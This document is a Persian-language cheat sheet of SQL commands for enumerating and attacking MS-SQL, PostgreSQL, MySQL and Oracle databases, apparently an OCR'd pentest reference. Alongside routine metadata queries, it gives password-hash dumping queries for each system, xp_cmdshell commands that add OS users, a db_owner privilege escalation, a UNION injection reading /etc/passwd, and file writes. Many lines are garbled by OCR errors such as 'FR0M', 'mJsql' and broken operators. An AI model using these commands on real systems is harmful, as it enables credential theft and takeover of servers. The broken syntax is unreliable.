پایگاه داده
Ms-sql
| دستور | توضیح |
|---|---|
| SELECT @@version | نسخه پایگاه داده |
| EXEC xp_msver | جزییات نسخه |
| EXEC master..xp_cmdshell 'net user' | اجرا دستور سیستم عامل |
| SELECT HOST_ NAME() | دریافت Hostname و IP |
| SELECT DB_ NAME() | پایگاه داده فعلی |
| SELECT name FROM master..sysdatabases; | لیست پایگاه داده ها |
| SELECT user name() | کاربر فعلی |
| SELECT name FROM master .. sjslogins | لیست کاربران |
|
SELECT name FROM master..sysobjects WHERE xtype= 'U'; |
لیست جدول ها |
|
SELECT name FROM syscolumns WHERE id=(SELECT id FR0M sysobjects WHERE name- 'mjtable' ) ; |
لیست ستون ها |
اطلاعات درباره تمام جدول های پایگاه داده در جدول سیستم
SELECT TOP 1 TABLE_NAME FROM INFORMATION SCHEMA.TABLES
لیست جدول و ستون ها
SELECT name FROM Syscolumns WHERE id
(SELECT id FROM Sysobjects WHERE
name= 'mytable')
هش کلمه عبور
SELECT name, password hash FROM master.sys.sgl_logins
دور زدن سطح دسترسی کاربر
execute('execute(''alter role [db_owner] add member [client]'') at "compatibility\poo_public"')
Postgres
| دستور | توضیح |
|---|---|
| SELECT version(); | نسخه پایگاه داده |
| SELECT inet server_addr() | دریافت Hostname و IP |
| SELECT current database(); | پایگاه داده فعلی |
| SELECT datname FROM pg database; | لیست پایگاه داده |
| SELECT user; | کاربر جاری |
| SELECT username FROM pg_user; | لیست کاربران |
| SELECT username,passwd FROM pg shadow | لیست هش کلمه عبور |
لیست ستون
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttjpid=T.oid) AND (A.attnum 0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public')
لیست جدول ها
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN
pg catalog.pg namespace n ON n.oid = c.relnamespace WHERE c.relkind IN
( 'r',") AND n.nspname NOT IN ( 'pg catalog', 'pg toast') AND
pg_catalog.pg_table_is_visible(c.oid)
Mysql
| دستور | توضیح |
|---|---|
| SELECT @@version; | نسخه پایگاه دااده |
| SELECT @@hostname; | دریافت Hostname و IP |
| SELECT database(); | پایگاه داده فعلی |
| SELECT distinct (db) FROM mysql.db; | لیست پایگاه داده ها |
| SELECT user(); | کاربر فعلی |
| SELECT user FROM mysql.user; | لیست کاربران |
| SELECT host,user,password FROM mJsql.user; | لیست هش کلمه عبور ها |
لیست تمامی جداول و ستون ها
SELECT table schema, table name, column_ name FR0M
information scherna.columns WHERE
table schema != 'mysql' AND table schema != 'information schema'
اجرای دستور سیستم عامل در mysql
osql -S ip , port -U sa -P pwd -Q "exec xp cmdshell `net user /add user
passr`"
خواندن فایلی های خواندنی در mysql
UNION ALL SELECT LOAD FILE( '/etc/passwd');
نوشتن در فایل سیستم در mysql
SELECT * FROM mytable INTO dumpfile '/tmp/ somefile';
Oracle
| دستور | توضیح |
|---|---|
| SELECT * FROM v$version; | نسخه پایگاه داده |
| SELECT version FROM v$instance; | نسخه پایگاه داد |
| SELECT instance name FROM v$instance; | پایگاه داده فعلی |
| SELECT name FROM v$database; | پایگاه داده فعلی |
| SELECT DISTINCT owner FROM all_tables; | لیست پایگاه داده ها |
| SELECT user FROM dual; | کاربر فعلی |
|
SELECT username FROM all_users ORDER BY username; |
لیست کابران |
| SELECT column name FROM all_tab_columns; | لیست ستون ها |
| SELECT table name FROM all_tables; | لیست جدول ها |
| SELECT name, password, astatus FROM sys.user$; | لیست هش کلمه عبور ها |
لیست پایگاه های داده
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';